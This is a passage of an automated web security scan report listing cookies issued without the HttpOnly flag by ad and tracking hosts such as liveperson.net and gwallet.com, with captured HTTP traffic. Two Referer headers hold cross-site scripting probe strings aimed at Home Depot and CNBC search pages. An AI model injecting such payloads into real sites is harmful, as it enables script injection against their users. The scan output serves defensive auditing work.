The following cookie was issued by the application and does not have the HttpOnly flag set:

npii=btrm/svid%3D943168581484fdb7c20^cguid/3666b2e01300a47a44d622a6ffc193724fdb7c20^; Domain=.ebay.com; Expires=Fri, 15-Jun-2012 18:17:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.299. http://rover.ebay.com/ar/1/76418/4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/ar/1/76418/4

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

npii=btrm/svid%3D943168581484fdb7c20^cguid/3666b2e01300a47a44d622a6ffc193724fdb7c20^; Domain=.ebay.com; Expires=Fri, 15-Jun-2012 18:17:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.300. http://rp.gwallet.com/r1/ucm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rp.gwallet.com
Path:	/r1/ucm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ra1_uid=4626038992661376064; Expires=Fri, 15-Jun-2012 13:09:08 GMT; Path=/; Domain=gwallet.com; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.301. http://rs.gwallet.com/r1/pixel/x113 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x113

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ra1_uid=4626038992661376064; Expires=Fri, 15-Jun-2012 13:08:50 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=O4-e5X0-I3X0; Expires=Fri, 15-Jun-2012 13:08:50 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.302. http://rs.gwallet.com/r1/pixel/x9r8101111 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x9r8101111

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ra1_uid=4626038992661376064; Expires=Sat, 16-Jun-2012 10:26:34 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=P4-710-e5Y0-I3Y0; Expires=Sat, 16-Jun-2012 10:26:34 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.303. http://rs.gwallet.com/r1/pixel/x9r8962146 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x9r8962146

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ra1_uid=4626038992661376064; Expires=Sat, 16-Jun-2012 10:26:32 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=P4-710-e5Y0-I3Y0; Expires=Sat, 16-Jun-2012 10:26:32 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Content-Length: 748
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Sat, 16-Jun-2012 10:26:32 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=P4-710-e5Y0-I3Y0; Expires=Sat, 16-Jun-2012 10:26:32 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Sat, 16-Jun-2012 10:26:32 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body>
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1009481472;
var google_conversion_language = "en";
var
...[SNIP]...

11.304. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lgtix=NQACAM8ANgABAMUABgABAMUARAQBANYASQABAMUASgABAMUADAABAMUAHAAEAOMA/QABAMUAXgACANkAXwABAMUA; path=/; expires=Sat, 01-Jan-2050 23:59:59 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.305. http://sales.liveperson.net/hc/55601019/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/55601019/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=3522719960534431997; path=/hc/55601019
HumanClickACTIVE=1308307277856; expires=Sat, 18-Jun-2011 10:41:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/55601019/?&site=55601019&cmd=mTagKnockPage&lpCallId=226892389357-23233191809&protV=20&lpjson=1&id=5882508600&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-uscard-sales-english%7ClpMTagConfig.db1%7Clpbuttondiv%7C%23Chat-uscard-sales-english-www%7ClpMTagConfig.db1%7Clpbuttondiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1308227834170

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:41:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=3522719960534431997; path=/hc/55601019
Set-Cookie: HumanClickACTIVE=1308307277856; expires=Sat, 18-Jun-2011 10:41:17 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 17 Jun 2011 10:41:17 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28099

lpConnLib.Process({"ResultSet": {"lpCallId":"226892389357-23233191809","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.ne
...[SNIP]...

11.306. http://sales.liveperson.net/hc/55601019/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/55601019/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1308307416106; expires=Sat, 18-Jun-2011 10:43:36 GMT; path=/
HumanClickSiteContainerID_55601019=STANDALONE; path=/hc/55601019
LivePersonID=-16101514677756-1308307280:-1:-1:-1:-1; expires=Sat, 16-Jun-2012 10:43:36 GMT; path=/hc/55601019; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/55601019/?&site=55601019&cmd=mTagKnockPage&lpCallId=115308621665-687858146382&protV=20&lpjson=1&id=1215056642&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-uscard-sales-english%7ClpMTagConfig.db1%7Clpbuttondiv%7C%23Chat-uscard-sales-english-www%7ClpMTagConfig.db1%7Clpbuttondiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85815EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1308227834170

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:43:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1308307416106; expires=Sat, 18-Jun-2011 10:43:36 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 17 Jun 2011 10:43:36 GMT
Set-Cookie: HumanClickSiteContainerID_55601019=STANDALONE; path=/hc/55601019
Set-Cookie: LivePersonID=-16101514677756-1308307280:-1:-1:-1:-1; expires=Sat, 16-Jun-2012 10:43:36 GMT; path=/hc/55601019; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28100

lpConnLib.Process({"ResultSet": {"lpCallId":"115308621665-687858146382","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

11.307. http://sales.liveperson.net/hc/55601019/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/55601019/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LivePersonID=-16101514677756-1308307280:0; expires=Sat, 16-Jun-2012 10:41:20 GMT; path=/hc/55601019; domain=.liveperson.net
HumanClickKEY=3522719960534431997; path=/hc/55601019
HumanClickSiteContainerID_55601019=STANDALONE; path=/hc/55601019
LivePersonID=-16101514677756-1308307280:-1:-1:-1:-1; expires=Sat, 16-Jun-2012 10:41:20 GMT; path=/hc/55601019; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.308. http://sales.liveperson.net/hc/57386690/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/57386690/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=5060185882005605638; path=/hc/57386690
HumanClickACTIVE=1308229924284; expires=Fri, 17-Jun-2011 13:12:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/57386690/?&site=57386690&cmd=mTagKnockPage&lpCallId=132910409261-492221344221&protV=20&lpjson=1&id=9888517654&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-customerservice-english%7ClpMTagConfig.StaticButtonBehavior%7Clpbuttondiv%7C HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253Ea4a06%253balert%25281%2529%252f%252fb77fcd64d48&omni=3&selectedCatgry=SEARCH+ALL
Cookie: HumanClickKEY=3493114614423076878; LivePersonID=-16601155425835-1308225618:-1:-1:-1:-1; HumanClickSiteContainerID_57386690=STANDALONE; LivePersonID=LP i=16601155425835,d=1302186497; ASPSESSIONIDSQSQRATA=PJOLLFECKOBKMPAFOFJDLMGB; HumanClickACTIVE=1308225615809; ASPSESSIONIDQSDBQDCT=OPHHOLECBDAPJPPPJCBGANME

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:12:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=5060185882005605638; path=/hc/57386690
Set-Cookie: HumanClickACTIVE=1308229924284; expires=Fri, 17-Jun-2011 13:12:04 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 16 Jun 2011 13:12:04 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27960

lpConnLib.Process({"ResultSet": {"lpCallId":"132910409261-492221344221","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

11.309. http://sales.liveperson.net/hc/57386690/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/57386690/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1308223754992; expires=Fri, 17-Jun-2011 11:29:14 GMT; path=/
HumanClickSiteContainerID_57386690=STANDALONE; path=/hc/57386690
LivePersonID=-16101514677756-1308223637:-1:-1:-1:-1; expires=Fri, 15-Jun-2012 11:29:14 GMT; path=/hc/57386690; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.310. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

segments_p1="eJwdkEFLAlEUhZmZt3jM6v2w9vUX+hkSFom20E1JEWZuoqTRIQzJlThJRG6iTBKC0TAaaGgxwkzaPWdzOJz55tx7n6t03HVcpR+Xtug0s0Tnb/Cft8ijEL48gz6QCZiUAtt19GpTrE/8LIMOWHAcQVt3SE6YN3IoGyTw3yl0LKSjh1okAH3xBOI+RG1uy3V133NMs1ZNlMTVCpAhJ/dS+J0V1F8j6TThPybwzy34oyVqPA2QyBdnFtuYud6Q9klemfcsH6O9yOt89nox/KIHnbVtIW+ubHNY2SXZIFPuQn+5zXiEtUc87JoPUZrzrfi19gKNTrFN3Yi9ZMEiRVDYFtsv4P9zxsmfJfP2Qsu8dg5+FN4XF0z3gdQz+x8/EXqu";Version=1;Path=/;Domain=invitemedia.com;Expires=Fri, 15-Jun-2012 12:52:40 GMT;Max-Age=31536000

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.311. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segs.btrll.com
Path:	/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BR_MBBV=Ak3UHRx%2BKy%2FsAb%2Fk4Ck; expires=Thu, 14-Jun-2012 11:26:56 GMT; path=/; domain=.btrll.com
DRN1=AGPX0VGWhBwAY9juTn4YeQBj2HROVkeDAGPYxU5-GHkAY9i_Tn4YeQBj3E5Rrwz4AGPYOk5wj4A; expires=Sat, 15-Jun-2013 11:26:56 GMT; path=/; domain=.btrll.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.312. http://services.krxd.net/geoip previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/geoip

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ServedBy=logger014; path=/; domain=.krxd.net; expires=Wed, 14-Dec-2011 00:46:29 GMT
AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C5D64AB646BFEB78D85C2CE1B11A4408BBF84184FD95AB42FCDD37D4A5888A04E880077C4A63DD8E25321BB4EF5F9550AD0FDC6E3F9FDDF363AFDD86EB238E86A;PATH=/;DOMAIN=.krxd.net;EXPIRES=Wed, 14-Dec-2011 00:46:29 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.313. http://services.krxd.net/pixel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/pixel.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ServedBy=logger014; path=/; domain=.krxd.net; expires=Wed, 14-Dec-2011 00:47:11 GMT
AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C5D64AB646BFEB78D85C2CE1B11A4408BBF84184FD95AB42FCDD37D4A5888A04E880077C4A63DD8E25321BB4EF5F9550AD0FDC6E3F9FDDF363AFDD86EB238E86A;PATH=/;DOMAIN=.krxd.net;EXPIRES=Wed, 14-Dec-2011 00:47:11 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.314. http://spotlight.creditcards.com/www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spotlight.creditcards.com
Path:	/www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=aaa441a9105b309385d19a81a43e09ae; expires=Sat, 16-Jun-2012 10:39:31 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ajs.php?zoneid=29&cb=71696362550&charset=ISO-8859-1&loc=http%3A//www.creditcards.com/ HTTP/1.1
Host: spotlight.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:31 GMT
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=aaa441a9105b309385d19a81a43e09ae; expires=Sat, 16-Jun-2012 10:39:31 GMT; path=/
Content-Length: 837
Content-Type: text/javascript; charset=ISO-8859-1

var OX_1063c1a8 = '';
OX_1063c1a8 += "<"+"a href=\'http://spotlight.creditcards.com/www/delivery/ck.php?oaparams=2__bannerid=63__zoneid=29__cb=13ba15683e__oadest=http%3A%2F%2Fwww.creditcards.com%2Fcar
...[SNIP]...

11.315. http://spotlight.creditcards.com/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spotlight.creditcards.com
Path:	/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=aaa441a9105b309385d19a81a43e09ae; expires=Sat, 16-Jun-2012 10:39:33 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=63&campaignid=6&zoneid=29&loc=http%3A%2F%2Fwww.creditcards.com%2F&cb=d822e6da23 HTTP/1.1
Host: spotlight.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; OAID=aaa441a9105b309385d19a81a43e09ae

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:33 GMT
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=aaa441a9105b309385d19a81a43e09ae; expires=Sat, 16-Jun-2012 10:39:33 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.316. http://sync.mathtag.com/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ts=1308226098; domain=.mathtag.com; path=/; expires=Fri, 15-Jun-2012 12:08:18 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.317. http://t2.trackalyzer.com/trackalyze.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t2.trackalyzer.com
Path:	/trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

loop=http%3A%2F%2Fradiumone%2Ecom%2F; expires=Sat, 18-Jun-2011 07:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=None&p=http%3A//radiumone.com/&i=18186 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://radiumone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=251737230614108; loop=http%3A%2F%2Fradiumone%2Ecom%2F; ASPSESSIONIDAQCRQSCT=EAFKGGGBAAFONGELIHGLFICM

Response

HTTP/1.1 302 Object moved
Date: Fri, 17 Jun 2011 10:26:41 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fradiumone%2Ecom%2F; expires=Sat, 18-Jun-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>

11.318. http://tacoda.at.atwola.com/rtx/r.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; path=/; expires=Mon, 11-Jun-12 10:39:33 GMT; domain=.at.atwola.com
Tsid=0^1308307172^1308308973|18201^1308307172^1308308973; path=/; expires=Fri, 17-Jun-11 11:09:33 GMT; domain=tacoda.at.atwola.com
TData=99999|^|51134|56282|57094|60740|56297|57130|57129|53380|60489|60515|52615|57289|52946|53656|55401|50557|54255|53778|54252|50961|54209|56681|55467|56969|56835|56780|56232|56673|56768|57372|56761|54208|57288|52947|56153; expires=Mon, 11-Jun-12 10:39:33 GMT; path=/; domain=tacoda.at.atwola.com
N=2:f09c3ed82a5deedcd5f3f90b36c3d896,820ce15ad71ebb5ed9e6683b5630c89d; expires=Mon, 11-Jun-12 10:39:33 GMT; path=/; domain=tacoda.at.atwola.com
ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1NTc6NTQyNTU6NTM3Nzg6NTQyNTI6NTA5NjE6NTQyMDk6NTY2ODE6NTU0Njc6NTY5Njk6NTY4MzU6NTY3ODA6NTYyMzI6NTY2NzM6NTY3Njg6NTczNzI=; expires=Mon, 11-Jun-12 10:39:33 GMT; path=/; domain=.at.atwola.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.gif?cmd=ESU&si=18201&pi=-&xs=3 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&phint=__bk_t%3DCredit%20Cards%20-%20Compare%20Credit%20Card%20Offers%20at%20CreditCards.com&phint=__bk_k%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&limit=4&r=92667289
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DD6D67B6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; TData=99999|^|51134|56282|61674|57094|60740|56297|57130|57129|61576|51184|53380|60489|60515|52615|57289|52946|53656|55401|50507|50557|54255|53778|51182|54252|50961|54209|56988|57372|56780|56232|56142|56768|56761|56681|56153; N=2:b1077b952a25f0fd4f2da32539b57495,f09c3ed82a5deedcd5f3f90b36c3d896; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NjE2NzQ6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NjE1NzY6NTExODQ6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1MDc6NTA1NTc6NTQyNTU6NTM3Nzg6NTExODI6NTQyNTI6NTA5NjE6NTQyMDk6NTY5ODg6NTczNzI6NTY3ODA6NTYyMzI=

Response

11.319. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

D41U=3xPTyUJ2ruGmO9ht63sVUErSb7aHh3U4uzUrnJuDyUyA7kjGQg844TA; expires=Fri, 15-Jul-2011 10:13:08 GMT; path=/; domain=.tag.admeld.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/677/cnbc/300x250/atf?01AD=3xPTyUJ2ruGmO9ht63sVUErSb7aHh3U4uzUrnJuDyUyA7kjGQg844TA&01RI=5DF2D446C35D999&01NA=&t=1308305586056&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599; __qca=P0-1593807240-1305111258024; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1150
Content-Type: text/html
Date: Fri, 17 Jun 2011 10:13:08 GMT
Connection: close
Set-Cookie: D41U=3xPTyUJ2ruGmO9ht63sVUErSb7aHh3U4uzUrnJuDyUyA7kjGQg844TA; expires=Fri, 15-Jul-2011 10:13:08 GMT; path=/; domain=.tag.admeld.com
